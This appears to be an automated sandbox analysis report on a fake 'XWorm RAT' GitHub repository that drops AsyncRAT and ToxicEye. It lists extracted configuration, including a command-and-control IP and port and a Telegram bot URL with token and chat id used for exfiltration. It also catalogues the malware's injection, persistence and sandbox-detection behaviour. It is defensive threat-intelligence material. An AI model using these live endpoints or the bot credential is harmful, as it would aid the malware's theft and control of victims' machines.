asyncrat | hxxps://github[.]com/errias/XWorm-Rat-Remote-Administration-Tool-

max time kernel
373s
max time network
374s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-05-2024 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-

Score

10^/10

asyncrat toxiceye def agilenet rat trojan

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

def

37.18.62.18:8060

Mutex

era2312swe12-1213rsgdkms23

Attributes

delay
1
install
true
install_file
CCXProcess.exe
install_folder
%Temp%

aes.plain

Extracted

Family

toxiceye

https://api.telegram.org/bot5687152406:AAFin_LYFhJGLydMgYheeUDec-2orew51aM/sendMessage?chat_id=2024893777

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

416 6380 powershell.exe
418 5124 powershell.exe
420 1096 powershell.exe
421 6380 powershell.exe
Executes dropped EXE 7 IoCs

Processes:

dotnetfx45_full_setup.exeSetup.exewin-xworm-builder.exewsappx.exexworm.exexworm.exexworm.exe

pid process

5896 dotnetfx45_full_setup.exe
4124 Setup.exe
5372 win-xworm-builder.exe
6140 wsappx.exe
7116 xworm.exe
7040 xworm.exe
520 xworm.exe
Loads dropped DLL 6 IoCs

Processes:

Setup.exeXHVNC.exe

pid process

4124 Setup.exe
4124 Setup.exe
4124 Setup.exe
4124 Setup.exe
4124 Setup.exe
5400 XHVNC.exe

flow	pid	process
416	6380	powershell.exe
418	5124	powershell.exe
420	1096	powershell.exe
421	6380	powershell.exe

pid	process
5896	dotnetfx45_full_setup.exe
4124	Setup.exe
5372	win-xworm-builder.exe
6140	wsappx.exe
7116	xworm.exe
7040	xworm.exe
520	xworm.exe

pid	process
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
5400	XHVNC.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/5400-1345-0x00000000064D0000-0x00000000066F4000-memory.dmp	agile_net

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service
T1102

Processes:

flow ioc

404 camo.githubusercontent.com

flow	ioc
404	camo.githubusercontent.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

xworm.exexworm.exexworm.exe

description	pid	process	target process
PID 7116 set thread context of 5276	7116	xworm.exe	AppLaunch.exe
PID 7040 set thread context of 7048	7040	xworm.exe	AppLaunch.exe
PID 520 set thread context of 5156	520	xworm.exe	AppLaunch.exe

Drops file in Windows directory 12 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exetaskmgr.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

6308 7116 WerFault.exe xworm.exe
7068 7040 WerFault.exe xworm.exe
2172 520 WerFault.exe xworm.exe

pid	pid_target	process	target process
6308	7116	WerFault.exe	xworm.exe
7068	7040	WerFault.exe	xworm.exe
2172	520	WerFault.exe	xworm.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5920 schtasks.exe
4136 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1328 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

6060 tasklist.exe

pid	process
5920	schtasks.exe
4136	schtasks.exe

pid	process
1328	timeout.exe

pid	process
6060	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

browser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133590122443368352"	chrome.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\msn.com	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3f782425829bda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "132"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\msn.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\bing.com\ = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.msn.com\ = "101"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1219df29829bda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 20f7f63d829bda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "23"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = eeec9893829bda01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e3ea722a829bda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "646"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3e2ac032829bda01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeSetup.exewsappx.exetaskmgr.exechrome.exe

pid	process
3244	chrome.exe
3244	chrome.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
4124	Setup.exe
6140	wsappx.exe
6140	wsappx.exe
6140	wsappx.exe
6140	wsappx.exe
6140	wsappx.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
5636	chrome.exe
5636	chrome.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

XHVNC.exetaskmgr.exeOpenWith.exe

pid process

5400 XHVNC.exe
4104 taskmgr.exe
5444 OpenWith.exe

pid	process
5400	XHVNC.exe
4104	taskmgr.exe
5444	OpenWith.exe

Suspicious behavior: MapViewOfSection 16 IoCs

Processes:

MicrosoftEdgeCP.exe

pid	process
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
